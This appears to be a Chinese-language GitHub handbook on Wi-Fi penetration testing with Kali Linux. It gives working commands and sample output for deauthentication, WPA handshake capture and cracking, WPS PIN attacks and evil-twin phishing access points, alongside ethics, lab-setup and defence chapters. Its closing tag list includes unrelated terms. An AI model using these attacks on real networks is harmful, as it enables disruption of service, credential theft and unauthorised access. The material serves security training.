koushikos/Kali-Linux-WiFi-Pentesting-Handbook

# Kali-Linux-WiFi-渗透测试手册 这是一本为使用 Kali Linux 进行网络安全学习而构建的无线安全渗透测试指南。内容包括详细的教程、实验流程，以及使用 Aircrack-ng、Hashcat 和 Wifite 等工具进行 Wi-Fi 安全测试技术的实战演示。 **面向道德黑客和网络安全学生的综合培训手册** **作者：Koushik Debnath** **版本：1.0** **日期：2026** ## 目录 1. [无线安全简介](#chapter-1) 2. [法律和道德考量](#chapter-2) 3. [Kali Linux 无线环境设置](#chapter-3) 4. [无线网络基础](#chapter-4) 5. [无线网卡配置](#chapter-5) 6. [发现无线网络](#chapter-6) 7. [Aircrack-ng 套件](#chapter-7) 8. [捕获 WPA/WPA2 握手包](#chapter-8) 9. [取消认证攻击](#chapter-9) 10. [破解 WPA/WPA2 密码](#chapter-10) 11. [使用 Hashcat 进行高级密码破解](#chapter-11) 12. [自动化 Wi-Fi 黑客工具](#chapter-12) 13. [WPS 攻击](#chapter-13) 14. [邪恶双子攻击](#chapter-14) 15. [数据包捕获与分析](#chapter-15) 16. [无线流量分析](#chapter-16) 17. [无线攻击故障排除](#chapter-17) 18. [完整实战演练](#chapter-18) 19. [防御无线攻击](#chapter-19) 20. [实践实验室](#chapter-20) ## 第1章 — 无线安全简介 {#chapter-1} ### Wi-Fi 安全的历史 无线网络始于 802.11（1997年），最初是不安全的。WEP（1999年）使用 RC4 和静态密钥——于 2001 年被攻破（FMS 攻击）。WPA（2003年）引入了 TKIP。WPA2（2004年）使用 AES-CCMP，但容易受到 KRACK（2017年）攻击。WPA3（2018年）增加了 SAE（Dragonfly 握手）、前向保密和防字典攻击功能。 ### 无线网络的类型 - **Infrastructure（基础架构模式）**：客户端连接到 AP（BSS/ESS）。 - **Ad-hoc (IBSS)**：点对点。 - **Mesh（网状）**：多跳。 - **Enterprise（企业）**：RADIUS 认证。 ### WPA, WPA2, WPA3 概述 | 协议 | 加密 | 密钥交换 | 漏洞 | |----------|------------|--------------|-----------------| | WPA | TKIP (RC4) | PSK/802.1X | TKIP chop-chop | | WPA2 | CCMP (AES) | PSK/802.1X | KRACK, PMKID | | WPA3 | GCMP (AES) | SAE (Dragonfly) | Downgrade | ### 常见漏洞 - 弱 PSK、WPS PIN 暴力破解、邪恶双子、取消认证 DoS、KRACK。 ### 为什么渗透测试很重要 识别真实风险；无线 = 无边界。 ## 第2章 — 法律和道德考量 {#chapter-2} ### 法律 - **美国**：CFAA (18 U.S.C. § 1030)——未经授权访问属于重罪。 - **欧盟**：GDPR、网络犯罪指令。 - **全球**：获取书面授权。 ### 道德规则 - 范围文档、保密协议 (NDA)、不要对生产环境进行 DoS 攻击。 ### 实验室设置 - 自备路由器（例如刷了 OpenWRT 的 TP-Link）、虚拟机 Kali、隔离的 VLAN。 ### 负责任的披露 - 私下报告发现，90 天的补丁窗口期。 ## 第3章 — Kali Linux 无线环境设置 {#chapter-3} ### 安装 Kali 1. 下载 ISO：kali.org 2. 虚拟机：4GB 内存，USB 直通。 ### 更新 ``` sudo apt update && sudo apt full-upgrade -y sudo apt autoremove -y ``` ### 安装工具 ``` sudo apt install aircrack-ng hashcat hcxdumptool hcxtools wifite reaver bully hostapd dnsmasq -y ``` ### 检查网卡 ``` iwconfig ``` 输出： ``` wlan0 no wireless extensions. lo no wireless extensions. ``` ``` lsusb ``` 寻找 Realtek/Atheros。 ### 芯片组兼容性 - Alfa AWUS036ACH: rtl8812au. ### 监听/注入测试 ``` sudo airmon-ng start wlan0 sudo aireplay-ng --test wlan0mon ``` ## 第4章 — 无线网络基础 {#chapter-4} ### BSSID AP MAC 地址（48位，例如 AA:BB:CC:DD:EE:FF）。 ### ESSID 人类可读的名称（SSID，最多 32 个字符）。 ### Channel（信道） 频段（2.4GHz: 1-13, 5GHz: 36-165）。 ### Beacon Frames（信标帧） 周期性广播（100ms）：SSID、速率、安全信息。 ### Handshake Process（握手过程） 1. Probe/Beacon → 2. Auth → 3. Assoc → 4. 4次握手 (nonce, MIC). ### 加密类型 - None, WEP (已破解), WPA (TKIP), WPA2 (AES), WPA3 (SAE). **图示 (ASCII)**: ``` Client ----Probe----> AP Client <---Beacon---- AP Client --Auth Req--> AP Client <--Auth OK--- AP Client --Assoc Req-> AP Client <--Assoc OK-- AP Client <->4-Way HS-- AP (Keys derived) ``` ## 第5章 — 无线网卡配置 {#chapter-5} ### 模式 - **Managed（托管）**：客户端。 - **Monitor（监听）**：嗅探。 - **Master（主模式）**：AP。 ### 命令 ``` sudo airmon-ng check kill sudo airmon-ng start wlan0 # Creates wlan0mon iwconfig # Verify Mode:Monitor ``` 输出： ``` wlan0mon IEEE 802.11 Mode:Monitor Tx-Power=20 dBm ``` ``` sudo ip link set wlan0mon down sudo iwconfig wlan0mon mode monitor sudo ip link set wlan0mon up ``` 停止： ``` sudo airmon-ng stop wlan0mon ``` ## 第6章 — 发现无线网络 {#chapter-6} ### airodump-ng ``` sudo airodump-ng wlan0mon ``` **真实输出示例**： ``` CH 11 ][ Elapsed: 1:23:45 ][ 2024-XX-XX XX:XX BSSID PWR Beacons #Data, #/wep, CH MB ENC CIPHER AUTH ESSID AA:BB:CC:DD:EE:FF -1 150 200 0/0 11 54e WPA2 CCMP PSK TargetWiFi CC:DD:EE:FF:00:11 -30 120 50 0/0 6 54e WPA2 CCMP PSK NeighborNet TOP CLIENTS BSSID STATION PWR Rate Lost Frames CH AA:BB:CC:DD:EE:FF 11:22:33:44:55:66 -20 1e-1 0 123 11 ``` **列说明**： - BSSID: AP MAC - PWR: RSSI (信号) - CH: Channel (信道) - ENC: OPN/WEP/WPA2 - ESSID: 名称 ### iw dev / iwlist ``` iw dev wlan0mon scan iwlist wlan0mon scan ``` ### wash (WPS) ``` sudo wash -i wlan0mon ``` ## 第7章 — Aircrack-ng 套件 {#chapter-7} ### airmon-ng **用途**：接口管理。 **语法**：`airmon-ng [start|stop] iface` **示例**：见第5章。 ### airodump-ng **用途**：扫描器/捕获器。 **语法**：`airodump-ng [opts] iface` **场景**：目标：`--bssid AA:BB:CC:DD:EE:FF -c 11 -w cap wlan0mon` ### aireplay-ng **用途**：注入。 **语法**：`aireplay-ng [attack] [opts] iface` **攻击**：Deauth (`-0`), ARP replay (`-3`) 等。 ### aircrack-ng **用途**：破解器。 **语法**：`aircrack-ng [opts] capfile` ### airdecap-ng **用途**：解密 cap 文件。 ``` airdecap-ng -e ESSID capture.cap ``` ### airbase-ng **用途**：恶意 AP。 ``` sudo airbase-ng -c 11 -e 'FreeWiFi' wlan0mon ``` ## 第8章 — 捕获 WPA/WPA2 握手包 {#chapter-8} **认证**：预共享密钥 → PMK → PTK。 **握手**：4 个 EAPOL 消息。 **命令**： 1. `sudo airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w hs wlan0mon` 2. 确认：右上角 `[ WPA Handshake: AA:BB:CC:DD:EE:FF ]` ## 第9章 — 取消认证攻击 {#chapter-9} **是什么**：用于断开客户端连接的管理帧（无需 ack）。 **为什么**：强制重连 → 获得握手包。 **命令**： ``` sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon ``` 输出： ``` Sending DeAuth to station -- STMAC: [11:22:33:44:55:66] Sending 10 directed DeAuth. STMAC: [11:22:33:44:55:66]... ``` **数据包流向**：Deauth → 客户端重连 → 握手包被捕获。 ## 第10章 — 破解 WPA/WPA2 密码 {#chapter-10} **字典攻击**：尝试 PSK → PMK → 验证 MIC。 ``` aircrack-ng hs-01.cap -w /usr/share/wordlists/rockyou.txt ``` 输出： ``` KEY FOUND! [ password123 ] ``` **暴力破解**：`crunch 8 8 -t @@@@@@@@1 -o brute.txt` ## 第11章 — 使用 Hashcat 进行高级密码破解 {#chapter-11} **GPU**：更快（数百万 PMKs/秒）。 **转换**： ``` hcxdumptool -i wlan0mon -o hs.pcapng hcxpcapngtool -o hs.22000 hs.pcapng ``` **破解**： ``` hashcat -m 22000 hs.22000 rockyou.txt --force ``` `-m 22000`: WPA-PMKID-PBKDF2-PMKID+EAPOL 性能：RTX 4090 ~1M H/s. ## 第12章 — 自动化 Wi-Fi 黑客工具 {#chapter-12} ### wifite ``` sudo wifite --wpa --wps --dict rockyou.txt ``` 自动：扫描 → 取消认证 → 捕获 → 破解。 ### fluxion Git clone: https://github.com/FluxionNetwork/fluxion ``` ./fluxion.sh ``` 钓鱼邪恶双子。 ### fern wifi cracker ``` fern-wifi-cracker ``` GUI 扫描/攻击。 ## 第13章 — WPS 攻击 {#chapter-13} **漏洞**：8位 PIN (1st4 * 10000 + last4)，校验和。 ### wash ``` wash -i wlan0mon --all ``` 输出：WPS 锁定？，PIN 尝试次数。 ### reaver ``` reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 11 -vv -K 1 ``` ### bully 更快，并发。 ## 第14章 — 邪恶双子攻击 {#chapter-14} **虚假 AP** 伪装成合法 AP，钓鱼获取凭据。 ### airbase-ng ``` airbase-ng -c 11 -e 'TargetWiFi' -P 4 wlan0mon ``` ### fluxion 自动化钓鱼页面。 ### hostapd 配置 `hostapd.conf`: ``` interface=wlan0 ssid=TargetWiFi hw_mode=g channel=11 ``` `sudo hostapd hostapd.conf` ## 第15章 — 数据包捕获与分析 {#chapter-15} ### tcpdump ``` sudo tcpdump -i wlan0mon -w capture.pcap -s 0 ``` ### Wireshark `wireshark capture.pcap` 过滤器：`wlan.fc.type_subtype == 0x08` (beacons). ## 第16章 — 无线流量分析 {#chapter-16} **帧类型**： - **Mgmt (0)**: Beacon (8), Probe, Auth, Deauth (12). - **Control (1)**: RTS/CTS, ACK. - **Data (2)**: QoS Data. Wireshark: `wlan.fc.type == 0` (mgmt). ## 第17章 — 无线攻击故障排除 {#chapter-17} | 问题 | 修复 | |---------|-----| | No monitor | `sudo apt install firmware-realtek`; `modprobe rtl88xxau` | | Injection fail | `aireplay-ng --test` | | NM interfere | `airmon-ng check kill` | | RTL8812AU | DKMS driver: `git clone rtl88xxau` | ## 第18章 — 完整实战演练 {#chapter-18} **目标**：LabWiFi (BSSID: AA:BB:CC:DD:EE:FF, CH11, PSK:password123) 1. `sudo airmon-ng check kill; sudo airmon-ng start wlan0` 2. `sudo airodump-ng wlan0mon` → 记录详细信息 3. 终端1：`sudo airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w lab wlan0mon` 4. 终端2：`sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon` 5. `aircrack-ng lab-01.cap -w rockyou.txt` 6. 清理：`sudo airmon-ng stop wlan0mon; sudo service NetworkManager restart` ## 第19章 — 防御无线攻击 {#chapter-19} - **WPA3 Personal/Enterprise** - PSK：20+ 字符，密码短语 - 禁用 WPS（固件更新） - MAC 过滤 + RADIUS - 无线 IDS (Snort rules) - 802.11w (Mgmt frame protection) vs deauth - 监控：`airodump-ng` 告警 ## 第20章 — 实践实验室 {#chapter-20} ### 实验 1：基础扫描 扫描 10 个网络，记录 BSSIDs/ENC。 ### 实验 2：握手包捕获 从自己的 AP 捕获，在 Wireshark 中验证。 ### 实验 3：WPS Pixie Dust 在易受攻击的路由器上使用 reaver。 ### 实验 4：邪恶双子 设置 airbase-ng，连接受害者虚拟机。 ### 实验 5：完整攻击链 在实验室 AP 上使用 Wifite → 破解 → 报告。 **恭喜！** 您现在已经熟练掌握 Wi-Fi 渗透测试请合乎道德地练习。 **附录：字典** - `/usr/share/wordlists/dirb/` - SecLists GitHub **参考**： - aircrack-ng.org - kali.org/docs

标签：Aircrack-ng, Bitdefender, Deauth 攻击, Evil Twin, Hashcat, IEEE 802.11, Kali Linux 工具, PE 加载器, VEH, Wifite, Wi-Fi 安全, WPA2 破解, WPA 握手包, WPS 攻击, 中间人攻击, 字典攻击, 无线渗透, 无线网络审计, 渗透测试指南, 漏洞修复, 网络嗅探, 网络安全培训, 网络安全实验, 网络安全教程